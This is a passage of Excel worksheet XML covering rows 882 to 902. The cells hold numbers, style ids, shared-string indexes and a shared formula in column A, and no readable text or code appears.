      <c r="E882" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F882" s="14"/>
      <c r="G882" s="29">
        <v>2.0</v>
      </c>
      <c r="H882" s="29">
        <v>286.0</v>
      </c>
      <c r="I882" s="29">
        <v>77952.0</v>
      </c>
      <c r="J882" s="15"/>
      <c r="K882" s="15"/>
      <c r="L882" s="15"/>
      <c r="M882" s="14"/>
      <c r="N882" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O882" s="29">
        <v>1.0</v>
      </c>
      <c r="P882" s="29">
        <v>0.0</v>
      </c>
      <c r="Q882" s="15"/>
      <c r="R882" s="15"/>
      <c r="S882" s="15"/>
      <c r="T882" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U882" s="5"/>
      <c r="V882" s="5"/>
      <c r="W882" s="47"/>
      <c r="X882" s="45"/>
      <c r="Y882" s="45"/>
      <c r="Z882" s="38" t="s">
        <v>3606</v>
      </c>
      <c r="AA882" s="39" t="s">
        <v>3607</v>
      </c>
      <c r="AB882" s="38" t="s">
        <v>2705</v>
      </c>
      <c r="AC882" s="40">
        <v>90869.0</v>
      </c>
      <c r="AD882" s="5"/>
      <c r="AE882" s="14"/>
      <c r="AF882" s="14"/>
    </row>
    <row r="883">
      <c r="A883" s="6">
        <f t="shared" si="1"/>
        <v>0.5125060079</v>
      </c>
      <c r="B883" s="29">
        <v>1.0</v>
      </c>
      <c r="C883" s="14"/>
      <c r="D883" s="14"/>
      <c r="E883" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F883" s="14"/>
      <c r="G883" s="29">
        <v>2.0</v>
      </c>
      <c r="H883" s="29">
        <v>419.0</v>
      </c>
      <c r="I883" s="29">
        <v>142078.0</v>
      </c>
      <c r="J883" s="15"/>
      <c r="K883" s="29">
        <v>142078.0</v>
      </c>
      <c r="L883" s="15"/>
      <c r="M883" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N883" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O883" s="29">
        <v>2.0</v>
      </c>
      <c r="P883" s="29">
        <v>1.0</v>
      </c>
      <c r="Q883" s="15"/>
      <c r="R883" s="15"/>
      <c r="S883" s="15"/>
      <c r="T883" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U883" s="5"/>
      <c r="V883" s="5"/>
      <c r="W883" s="47"/>
      <c r="X883" s="45"/>
      <c r="Y883" s="45"/>
      <c r="Z883" s="38" t="s">
        <v>3608</v>
      </c>
      <c r="AA883" s="39" t="s">
        <v>3609</v>
      </c>
      <c r="AB883" s="38" t="s">
        <v>3610</v>
      </c>
      <c r="AC883" s="40">
        <v>254773.0</v>
      </c>
      <c r="AD883" s="5"/>
      <c r="AE883" s="14"/>
      <c r="AF883" s="14"/>
    </row>
    <row r="884">
      <c r="A884" s="6">
        <f t="shared" si="1"/>
        <v>0.1003930488</v>
      </c>
      <c r="B884" s="29">
        <v>1.0</v>
      </c>
      <c r="C884" s="15"/>
      <c r="D884" s="14"/>
      <c r="E884" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F884" s="14"/>
      <c r="G884" s="29">
        <v>0.0</v>
      </c>
      <c r="H884" s="29">
        <v>3703.0</v>
      </c>
      <c r="I884" s="29">
        <v>270099.0</v>
      </c>
      <c r="J884" s="15"/>
      <c r="K884" s="29">
        <v>270099.0</v>
      </c>
      <c r="L884" s="15"/>
      <c r="M884" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N884" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O884" s="29">
        <v>2.0</v>
      </c>
      <c r="P884" s="29">
        <v>4.0</v>
      </c>
      <c r="Q884" s="15"/>
      <c r="R884" s="15"/>
      <c r="S884" s="15"/>
      <c r="T884" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U884" s="5"/>
      <c r="V884" s="5"/>
      <c r="W884" s="47"/>
      <c r="X884" s="45"/>
      <c r="Y884" s="45"/>
      <c r="Z884" s="38" t="s">
        <v>3611</v>
      </c>
      <c r="AA884" s="39" t="s">
        <v>3612</v>
      </c>
      <c r="AB884" s="38" t="s">
        <v>3613</v>
      </c>
      <c r="AC884" s="40">
        <v>257109.0</v>
      </c>
      <c r="AD884" s="5"/>
      <c r="AE884" s="14"/>
      <c r="AF884" s="14"/>
    </row>
    <row r="885">
      <c r="A885" s="6">
        <f t="shared" si="1"/>
        <v>0.42379309</v>
      </c>
      <c r="B885" s="29">
        <v>1.0</v>
      </c>
      <c r="C885" s="29">
        <v>211812.0</v>
      </c>
      <c r="D885" s="14"/>
      <c r="E885" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F885" s="14"/>
      <c r="G885" s="29">
        <v>8.0</v>
      </c>
      <c r="H885" s="29">
        <v>2014.0</v>
      </c>
      <c r="I885" s="29">
        <v>59842.0</v>
      </c>
      <c r="J885" s="15"/>
      <c r="K885" s="29">
        <v>6253.0</v>
      </c>
      <c r="L885" s="15"/>
      <c r="M885" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N885" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O885" s="29">
        <v>2.0</v>
      </c>
      <c r="P885" s="29">
        <v>2.0</v>
      </c>
      <c r="Q885" s="15"/>
      <c r="R885" s="15"/>
      <c r="S885" s="15"/>
      <c r="T885" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U885" s="5"/>
      <c r="V885" s="5"/>
      <c r="W885" s="47"/>
      <c r="X885" s="45"/>
      <c r="Y885" s="45"/>
      <c r="Z885" s="38" t="s">
        <v>3614</v>
      </c>
      <c r="AA885" s="39" t="s">
        <v>3615</v>
      </c>
      <c r="AB885" s="38" t="s">
        <v>3616</v>
      </c>
      <c r="AC885" s="40">
        <v>209886.0</v>
      </c>
      <c r="AD885" s="5"/>
      <c r="AE885" s="14"/>
      <c r="AF885" s="14"/>
    </row>
    <row r="886">
      <c r="A886" s="6">
        <f t="shared" si="1"/>
        <v>0.7085083622</v>
      </c>
      <c r="B886" s="29">
        <v>1.0</v>
      </c>
      <c r="C886" s="15"/>
      <c r="D886" s="14"/>
      <c r="E886" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F886" s="14"/>
      <c r="G886" s="29">
        <v>0.0</v>
      </c>
      <c r="H886" s="29">
        <v>223.0</v>
      </c>
      <c r="I886" s="29">
        <v>68100.0</v>
      </c>
      <c r="J886" s="15"/>
      <c r="K886" s="15"/>
      <c r="L886" s="15"/>
      <c r="M886" s="14"/>
      <c r="N886" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O886" s="29">
        <v>2.0</v>
      </c>
      <c r="P886" s="29">
        <v>1.0</v>
      </c>
      <c r="Q886" s="15"/>
      <c r="R886" s="15"/>
      <c r="S886" s="15"/>
      <c r="T886" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U886" s="5"/>
      <c r="V886" s="5"/>
      <c r="W886" s="47"/>
      <c r="X886" s="45"/>
      <c r="Y886" s="45"/>
      <c r="Z886" s="38" t="s">
        <v>3617</v>
      </c>
      <c r="AA886" s="39" t="s">
        <v>3618</v>
      </c>
      <c r="AB886" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC886" s="40">
        <v>81386.0</v>
      </c>
      <c r="AD886" s="5"/>
      <c r="AE886" s="14"/>
      <c r="AF886" s="14"/>
    </row>
    <row r="887">
      <c r="A887" s="6">
        <f t="shared" si="1"/>
        <v>0.3110303215</v>
      </c>
      <c r="B887" s="29">
        <v>1.0</v>
      </c>
      <c r="C887" s="29">
        <v>175063.0</v>
      </c>
      <c r="D887" s="14"/>
      <c r="E887" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F887" s="14"/>
      <c r="G887" s="29">
        <v>0.0</v>
      </c>
      <c r="H887" s="29">
        <v>441.0</v>
      </c>
      <c r="I887" s="29">
        <v>9456.0</v>
      </c>
      <c r="J887" s="15"/>
      <c r="K887" s="15"/>
      <c r="L887" s="15"/>
      <c r="M887" s="14"/>
      <c r="N887" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O887" s="29">
        <v>1.0</v>
      </c>
      <c r="P887" s="29">
        <v>1.0</v>
      </c>
      <c r="Q887" s="15"/>
      <c r="R887" s="15"/>
      <c r="S887" s="15"/>
      <c r="T887" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U887" s="5"/>
      <c r="V887" s="5"/>
      <c r="W887" s="47"/>
      <c r="X887" s="45"/>
      <c r="Y887" s="45"/>
      <c r="Z887" s="38" t="s">
        <v>3619</v>
      </c>
      <c r="AA887" s="39" t="s">
        <v>3620</v>
      </c>
      <c r="AB887" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC887" s="40">
        <v>175062.0</v>
      </c>
      <c r="AD887" s="5"/>
      <c r="AE887" s="14"/>
      <c r="AF887" s="14"/>
    </row>
    <row r="888">
      <c r="A888" s="6">
        <f t="shared" si="1"/>
        <v>0.9716588407</v>
      </c>
      <c r="B888" s="29">
        <v>1.0</v>
      </c>
      <c r="C888" s="29">
        <v>185526.0</v>
      </c>
      <c r="D888" s="14"/>
      <c r="E888" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F888" s="14"/>
      <c r="G888" s="29">
        <v>4.0</v>
      </c>
      <c r="H888" s="29">
        <v>1500.0</v>
      </c>
      <c r="I888" s="29">
        <v>177737.0</v>
      </c>
      <c r="J888" s="15"/>
      <c r="K888" s="15"/>
      <c r="L888" s="15"/>
      <c r="M888" s="15"/>
      <c r="N888" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O888" s="29">
        <v>2.0</v>
      </c>
      <c r="P888" s="29">
        <v>2.0</v>
      </c>
      <c r="Q888" s="15"/>
      <c r="R888" s="15"/>
      <c r="S888" s="15"/>
      <c r="T888" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U888" s="5"/>
      <c r="V888" s="5"/>
      <c r="W888" s="47"/>
      <c r="X888" s="45"/>
      <c r="Y888" s="45"/>
      <c r="Z888" s="38" t="s">
        <v>3621</v>
      </c>
      <c r="AA888" s="39" t="s">
        <v>3622</v>
      </c>
      <c r="AB888" s="38" t="s">
        <v>1166</v>
      </c>
      <c r="AC888" s="40">
        <v>185522.0</v>
      </c>
      <c r="AD888" s="5"/>
      <c r="AE888" s="14"/>
      <c r="AF888" s="14"/>
    </row>
    <row r="889">
      <c r="A889" s="6">
        <f t="shared" si="1"/>
        <v>0.9683839433</v>
      </c>
      <c r="B889" s="29">
        <v>1.0</v>
      </c>
      <c r="C889" s="29">
        <v>38955.0</v>
      </c>
      <c r="D889" s="14"/>
      <c r="E889" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F889" s="14"/>
      <c r="G889" s="29">
        <v>9.0</v>
      </c>
      <c r="H889" s="29">
        <v>5093.0</v>
      </c>
      <c r="I889" s="15"/>
      <c r="J889" s="5" t="s">
        <v>3623</v>
      </c>
      <c r="K889" s="15"/>
      <c r="L889" s="5" t="s">
        <v>3623</v>
      </c>
      <c r="M889" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N889" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O889" s="29">
        <v>1.0</v>
      </c>
      <c r="P889" s="29">
        <v>0.0</v>
      </c>
      <c r="Q889" s="15"/>
      <c r="R889" s="15"/>
      <c r="S889" s="15"/>
      <c r="T889" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U889" s="5"/>
      <c r="V889" s="5"/>
      <c r="W889" s="47"/>
      <c r="X889" s="45"/>
      <c r="Y889" s="45"/>
      <c r="Z889" s="38" t="s">
        <v>3624</v>
      </c>
      <c r="AA889" s="39" t="s">
        <v>3625</v>
      </c>
      <c r="AB889" s="38" t="s">
        <v>3626</v>
      </c>
      <c r="AC889" s="40">
        <v>38953.0</v>
      </c>
      <c r="AD889" s="5"/>
      <c r="AE889" s="14"/>
      <c r="AF889" s="14"/>
    </row>
    <row r="890">
      <c r="A890" s="6">
        <f t="shared" si="1"/>
        <v>0.8866949696</v>
      </c>
      <c r="B890" s="29">
        <v>1.0</v>
      </c>
      <c r="C890" s="14"/>
      <c r="D890" s="14"/>
      <c r="E890" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F890" s="14"/>
      <c r="G890" s="29">
        <v>1.0</v>
      </c>
      <c r="H890" s="29">
        <v>276.0</v>
      </c>
      <c r="I890" s="15"/>
      <c r="J890" s="5" t="s">
        <v>3627</v>
      </c>
      <c r="K890" s="15"/>
      <c r="L890" s="15"/>
      <c r="M890" s="15"/>
      <c r="N890" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O890" s="29">
        <v>2.0</v>
      </c>
      <c r="P890" s="29">
        <v>5.0</v>
      </c>
      <c r="Q890" s="15"/>
      <c r="R890" s="15"/>
      <c r="S890" s="15"/>
      <c r="T890" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U890" s="5"/>
      <c r="V890" s="5"/>
      <c r="W890" s="47"/>
      <c r="X890" s="45"/>
      <c r="Y890" s="45"/>
      <c r="Z890" s="38" t="s">
        <v>3628</v>
      </c>
      <c r="AA890" s="39" t="s">
        <v>3629</v>
      </c>
      <c r="AB890" s="38" t="s">
        <v>3630</v>
      </c>
      <c r="AC890" s="40">
        <v>169926.0</v>
      </c>
      <c r="AD890" s="5"/>
      <c r="AE890" s="14"/>
      <c r="AF890" s="14"/>
    </row>
    <row r="891">
      <c r="A891" s="6">
        <f t="shared" si="1"/>
        <v>0.35244022</v>
      </c>
      <c r="B891" s="29">
        <v>1.0</v>
      </c>
      <c r="C891" s="15"/>
      <c r="D891" s="14"/>
      <c r="E891" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F891" s="14"/>
      <c r="G891" s="29">
        <v>-2.0</v>
      </c>
      <c r="H891" s="29">
        <v>283.0</v>
      </c>
      <c r="I891" s="29">
        <v>224078.0</v>
      </c>
      <c r="J891" s="15"/>
      <c r="K891" s="29">
        <v>6253.0</v>
      </c>
      <c r="L891" s="15"/>
      <c r="M891" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N891" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O891" s="29">
        <v>1.0</v>
      </c>
      <c r="P891" s="29">
        <v>2.0</v>
      </c>
      <c r="Q891" s="15"/>
      <c r="R891" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S891" s="15"/>
      <c r="T891" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U891" s="5"/>
      <c r="V891" s="5"/>
      <c r="W891" s="47"/>
      <c r="X891" s="45"/>
      <c r="Y891" s="45"/>
      <c r="Z891" s="38" t="s">
        <v>3631</v>
      </c>
      <c r="AA891" s="39" t="s">
        <v>3632</v>
      </c>
      <c r="AB891" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC891" s="40">
        <v>223357.0</v>
      </c>
      <c r="AD891" s="5"/>
      <c r="AE891" s="14"/>
      <c r="AF891" s="14"/>
    </row>
    <row r="892">
      <c r="A892" s="6">
        <f t="shared" si="1"/>
        <v>0.339282933</v>
      </c>
      <c r="B892" s="29">
        <v>1.0</v>
      </c>
      <c r="C892" s="14"/>
      <c r="D892" s="14"/>
      <c r="E892" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F892" s="14"/>
      <c r="G892" s="29">
        <v>1.0</v>
      </c>
      <c r="H892" s="29">
        <v>139.0</v>
      </c>
      <c r="I892" s="29">
        <v>73644.0</v>
      </c>
      <c r="J892" s="15"/>
      <c r="K892" s="15"/>
      <c r="L892" s="15"/>
      <c r="M892" s="15"/>
      <c r="N892" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O892" s="29">
        <v>2.0</v>
      </c>
      <c r="P892" s="29">
        <v>5.0</v>
      </c>
      <c r="Q892" s="15"/>
      <c r="R892" s="15"/>
      <c r="S892" s="15"/>
      <c r="T892" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U892" s="5"/>
      <c r="V892" s="5"/>
      <c r="W892" s="47"/>
      <c r="X892" s="45"/>
      <c r="Y892" s="45"/>
      <c r="Z892" s="38" t="s">
        <v>3633</v>
      </c>
      <c r="AA892" s="39" t="s">
        <v>3634</v>
      </c>
      <c r="AB892" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC892" s="40">
        <v>87289.0</v>
      </c>
      <c r="AD892" s="5"/>
      <c r="AE892" s="14"/>
      <c r="AF892" s="14"/>
    </row>
    <row r="893">
      <c r="A893" s="6">
        <f t="shared" si="1"/>
        <v>0.190876565</v>
      </c>
      <c r="B893" s="29">
        <v>1.0</v>
      </c>
      <c r="C893" s="14"/>
      <c r="D893" s="14"/>
      <c r="E893" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F893" s="14"/>
      <c r="G893" s="29">
        <v>-5.0</v>
      </c>
      <c r="H893" s="29">
        <v>303.0</v>
      </c>
      <c r="I893" s="29">
        <v>118435.0</v>
      </c>
      <c r="J893" s="15"/>
      <c r="K893" s="15"/>
      <c r="L893" s="15"/>
      <c r="M893" s="15"/>
      <c r="N893" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O893" s="29">
        <v>2.0</v>
      </c>
      <c r="P893" s="29">
        <v>10.0</v>
      </c>
      <c r="Q893" s="15"/>
      <c r="R893" s="15"/>
      <c r="S893" s="15"/>
      <c r="T893" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U893" s="5"/>
      <c r="V893" s="5"/>
      <c r="W893" s="47"/>
      <c r="X893" s="45"/>
      <c r="Y893" s="45"/>
      <c r="Z893" s="38" t="s">
        <v>3635</v>
      </c>
      <c r="AA893" s="39" t="s">
        <v>3636</v>
      </c>
      <c r="AB893" s="38" t="s">
        <v>3637</v>
      </c>
      <c r="AC893" s="40">
        <v>218535.0</v>
      </c>
      <c r="AD893" s="5"/>
      <c r="AE893" s="14"/>
      <c r="AF893" s="14"/>
    </row>
    <row r="894">
      <c r="A894" s="6">
        <f t="shared" si="1"/>
        <v>0.7496141102</v>
      </c>
      <c r="B894" s="29">
        <v>1.0</v>
      </c>
      <c r="C894" s="15"/>
      <c r="D894" s="14"/>
      <c r="E894" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F894" s="14"/>
      <c r="G894" s="29">
        <v>1.0</v>
      </c>
      <c r="H894" s="29">
        <v>571.0</v>
      </c>
      <c r="I894" s="29">
        <v>100136.0</v>
      </c>
      <c r="J894" s="15"/>
      <c r="K894" s="29">
        <v>6253.0</v>
      </c>
      <c r="L894" s="15"/>
      <c r="M894" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N894" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O894" s="29">
        <v>1.0</v>
      </c>
      <c r="P894" s="29">
        <v>1.0</v>
      </c>
      <c r="Q894" s="15"/>
      <c r="R894" s="15"/>
      <c r="S894" s="15"/>
      <c r="T894" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U894" s="5"/>
      <c r="V894" s="5"/>
      <c r="W894" s="47"/>
      <c r="X894" s="45"/>
      <c r="Y894" s="45"/>
      <c r="Z894" s="38" t="s">
        <v>3638</v>
      </c>
      <c r="AA894" s="39" t="s">
        <v>3639</v>
      </c>
      <c r="AB894" s="38" t="s">
        <v>3640</v>
      </c>
      <c r="AC894" s="40">
        <v>113492.0</v>
      </c>
      <c r="AD894" s="5"/>
      <c r="AE894" s="14"/>
      <c r="AF894" s="14"/>
    </row>
    <row r="895">
      <c r="A895" s="6">
        <f t="shared" si="1"/>
        <v>0.1952616197</v>
      </c>
      <c r="B895" s="29">
        <v>1.0</v>
      </c>
      <c r="C895" s="15"/>
      <c r="D895" s="14"/>
      <c r="E895" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F895" s="14"/>
      <c r="G895" s="29">
        <v>1.0</v>
      </c>
      <c r="H895" s="29">
        <v>139.0</v>
      </c>
      <c r="I895" s="29">
        <v>234665.0</v>
      </c>
      <c r="J895" s="15"/>
      <c r="K895" s="29">
        <v>6253.0</v>
      </c>
      <c r="L895" s="15"/>
      <c r="M895" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N895" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O895" s="29">
        <v>0.0</v>
      </c>
      <c r="P895" s="29">
        <v>4.0</v>
      </c>
      <c r="Q895" s="15"/>
      <c r="R895" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S895" s="15"/>
      <c r="T895" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U895" s="5"/>
      <c r="V895" s="5"/>
      <c r="W895" s="47"/>
      <c r="X895" s="45"/>
      <c r="Y895" s="45"/>
      <c r="Z895" s="38" t="s">
        <v>3641</v>
      </c>
      <c r="AA895" s="39" t="s">
        <v>3642</v>
      </c>
      <c r="AB895" s="38" t="s">
        <v>3643</v>
      </c>
      <c r="AC895" s="40">
        <v>241113.0</v>
      </c>
      <c r="AD895" s="5"/>
      <c r="AE895" s="14"/>
      <c r="AF895" s="14"/>
    </row>
    <row r="896">
      <c r="A896" s="6">
        <f t="shared" si="1"/>
        <v>0.8152567805</v>
      </c>
      <c r="B896" s="29">
        <v>1.0</v>
      </c>
      <c r="C896" s="29">
        <v>165979.0</v>
      </c>
      <c r="D896" s="14"/>
      <c r="E896" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F896" s="14"/>
      <c r="G896" s="29">
        <v>1.0</v>
      </c>
      <c r="H896" s="29">
        <v>663.0</v>
      </c>
      <c r="I896" s="29">
        <v>99675.0</v>
      </c>
      <c r="J896" s="15"/>
      <c r="K896" s="15"/>
      <c r="L896" s="15"/>
      <c r="M896" s="14"/>
      <c r="N896" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O896" s="29">
        <v>2.0</v>
      </c>
      <c r="P896" s="29">
        <v>1.0</v>
      </c>
      <c r="Q896" s="15"/>
      <c r="R896" s="15"/>
      <c r="S896" s="15"/>
      <c r="T896" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U896" s="5"/>
      <c r="V896" s="5"/>
      <c r="W896" s="47"/>
      <c r="X896" s="45"/>
      <c r="Y896" s="45"/>
      <c r="Z896" s="38" t="s">
        <v>3644</v>
      </c>
      <c r="AA896" s="39" t="s">
        <v>3645</v>
      </c>
      <c r="AB896" s="38" t="s">
        <v>3646</v>
      </c>
      <c r="AC896" s="40">
        <v>165978.0</v>
      </c>
      <c r="AD896" s="5"/>
      <c r="AE896" s="14"/>
      <c r="AF896" s="14"/>
    </row>
    <row r="897">
      <c r="A897" s="6">
        <f t="shared" si="1"/>
        <v>0.000706870698</v>
      </c>
      <c r="B897" s="29">
        <v>1.0</v>
      </c>
      <c r="C897" s="15"/>
      <c r="D897" s="14"/>
      <c r="E897" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F897" s="14"/>
      <c r="G897" s="29">
        <v>2.0</v>
      </c>
      <c r="H897" s="29">
        <v>125.0</v>
      </c>
      <c r="I897" s="29">
        <v>21641.0</v>
      </c>
      <c r="J897" s="15"/>
      <c r="K897" s="15"/>
      <c r="L897" s="15"/>
      <c r="M897" s="14"/>
      <c r="N897" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O897" s="29">
        <v>0.0</v>
      </c>
      <c r="P897" s="29">
        <v>4.0</v>
      </c>
      <c r="Q897" s="15"/>
      <c r="R897" s="15"/>
      <c r="S897" s="15"/>
      <c r="T897" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U897" s="5"/>
      <c r="V897" s="5"/>
      <c r="W897" s="47"/>
      <c r="X897" s="45"/>
      <c r="Y897" s="45"/>
      <c r="Z897" s="38" t="s">
        <v>3647</v>
      </c>
      <c r="AA897" s="39" t="s">
        <v>3648</v>
      </c>
      <c r="AB897" s="38" t="s">
        <v>3649</v>
      </c>
      <c r="AC897" s="40">
        <v>220476.0</v>
      </c>
      <c r="AD897" s="5"/>
      <c r="AE897" s="14"/>
      <c r="AF897" s="14"/>
    </row>
    <row r="898">
      <c r="A898" s="6">
        <f t="shared" si="1"/>
        <v>0.9075824569</v>
      </c>
      <c r="B898" s="29">
        <v>1.0</v>
      </c>
      <c r="C898" s="29">
        <v>10015.0</v>
      </c>
      <c r="D898" s="14"/>
      <c r="E898" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F898" s="14"/>
      <c r="G898" s="29">
        <v>3.0</v>
      </c>
      <c r="H898" s="29">
        <v>178.0</v>
      </c>
      <c r="I898" s="29">
        <v>764.0</v>
      </c>
      <c r="J898" s="15"/>
      <c r="K898" s="29">
        <v>-1.0</v>
      </c>
      <c r="L898" s="15"/>
      <c r="M898" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N898" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O898" s="29">
        <v>2.0</v>
      </c>
      <c r="P898" s="29">
        <v>2.0</v>
      </c>
      <c r="Q898" s="15"/>
      <c r="R898" s="15"/>
      <c r="S898" s="15"/>
      <c r="T898" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U898" s="5"/>
      <c r="V898" s="5"/>
      <c r="W898" s="47"/>
      <c r="X898" s="45"/>
      <c r="Y898" s="45"/>
      <c r="Z898" s="38" t="s">
        <v>3650</v>
      </c>
      <c r="AA898" s="39" t="s">
        <v>3651</v>
      </c>
      <c r="AB898" s="38" t="s">
        <v>3652</v>
      </c>
      <c r="AC898" s="40">
        <v>10010.0</v>
      </c>
      <c r="AD898" s="5"/>
      <c r="AE898" s="14"/>
      <c r="AF898" s="14"/>
    </row>
    <row r="899">
      <c r="A899" s="6">
        <f t="shared" si="1"/>
        <v>0.2262149918</v>
      </c>
      <c r="B899" s="29">
        <v>1.0</v>
      </c>
      <c r="C899" s="14"/>
      <c r="D899" s="14"/>
      <c r="E899" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F899" s="14"/>
      <c r="G899" s="29">
        <v>1.0</v>
      </c>
      <c r="H899" s="29">
        <v>6409.0</v>
      </c>
      <c r="I899" s="29">
        <v>121140.0</v>
      </c>
      <c r="J899" s="15"/>
      <c r="K899" s="29">
        <v>6253.0</v>
      </c>
      <c r="L899" s="15"/>
      <c r="M899" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N899" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O899" s="29">
        <v>2.0</v>
      </c>
      <c r="P899" s="29">
        <v>0.0</v>
      </c>
      <c r="Q899" s="15"/>
      <c r="R899" s="15"/>
      <c r="S899" s="15"/>
      <c r="T899" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U899" s="5"/>
      <c r="V899" s="5"/>
      <c r="W899" s="47"/>
      <c r="X899" s="45"/>
      <c r="Y899" s="45"/>
      <c r="Z899" s="38" t="s">
        <v>3653</v>
      </c>
      <c r="AA899" s="39" t="s">
        <v>3654</v>
      </c>
      <c r="AB899" s="38" t="s">
        <v>3655</v>
      </c>
      <c r="AC899" s="40">
        <v>197436.0</v>
      </c>
      <c r="AD899" s="5"/>
      <c r="AE899" s="14"/>
      <c r="AF899" s="14"/>
    </row>
    <row r="900">
      <c r="A900" s="6">
        <f t="shared" si="1"/>
        <v>0.2182735176</v>
      </c>
      <c r="B900" s="29">
        <v>1.0</v>
      </c>
      <c r="C900" s="29">
        <v>238468.0</v>
      </c>
      <c r="D900" s="14"/>
      <c r="E900" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F900" s="14"/>
      <c r="G900" s="29">
        <v>0.0</v>
      </c>
      <c r="H900" s="29">
        <v>5793.0</v>
      </c>
      <c r="I900" s="29">
        <v>231350.0</v>
      </c>
      <c r="J900" s="15"/>
      <c r="K900" s="15"/>
      <c r="L900" s="15"/>
      <c r="M900" s="15"/>
      <c r="N900" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O900" s="29">
        <v>1.0</v>
      </c>
      <c r="P900" s="29">
        <v>3.0</v>
      </c>
      <c r="Q900" s="15"/>
      <c r="R900" s="15"/>
      <c r="S900" s="15"/>
      <c r="T900" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U900" s="5"/>
      <c r="V900" s="5"/>
      <c r="W900" s="47"/>
      <c r="X900" s="45"/>
      <c r="Y900" s="45"/>
      <c r="Z900" s="38" t="s">
        <v>3656</v>
      </c>
      <c r="AA900" s="39" t="s">
        <v>3657</v>
      </c>
      <c r="AB900" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC900" s="40">
        <v>238459.0</v>
      </c>
      <c r="AD900" s="5"/>
      <c r="AE900" s="14"/>
      <c r="AF900" s="14"/>
    </row>
    <row r="901">
      <c r="A901" s="6">
        <f t="shared" si="1"/>
        <v>0.3451665501</v>
      </c>
      <c r="B901" s="29">
        <v>1.0</v>
      </c>
      <c r="C901" s="29">
        <v>230446.0</v>
      </c>
      <c r="D901" s="14"/>
      <c r="E901" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F901" s="14"/>
      <c r="G901" s="29">
        <v>2.0</v>
      </c>
      <c r="H901" s="29">
        <v>189.0</v>
      </c>
      <c r="I901" s="29">
        <v>221458.0</v>
      </c>
      <c r="J901" s="15"/>
      <c r="K901" s="15"/>
      <c r="L901" s="15"/>
      <c r="M901" s="15"/>
      <c r="N901" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O901" s="29">
        <v>3.0</v>
      </c>
      <c r="P901" s="29">
        <v>0.0</v>
      </c>
      <c r="Q901" s="15"/>
      <c r="R901" s="15"/>
      <c r="S901" s="15"/>
      <c r="T901" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U901" s="5"/>
      <c r="V901" s="5"/>
      <c r="W901" s="47"/>
      <c r="X901" s="45"/>
      <c r="Y901" s="45"/>
      <c r="Z901" s="38" t="s">
        <v>3658</v>
      </c>
      <c r="AA901" s="39" t="s">
        <v>3659</v>
      </c>
      <c r="AB901" s="38" t="s">
        <v>3419</v>
      </c>
      <c r="AC901" s="40">
        <v>230409.0</v>
      </c>
      <c r="AD901" s="5"/>
      <c r="AE901" s="14"/>
      <c r="AF901" s="14"/>
    </row>
    <row r="902">
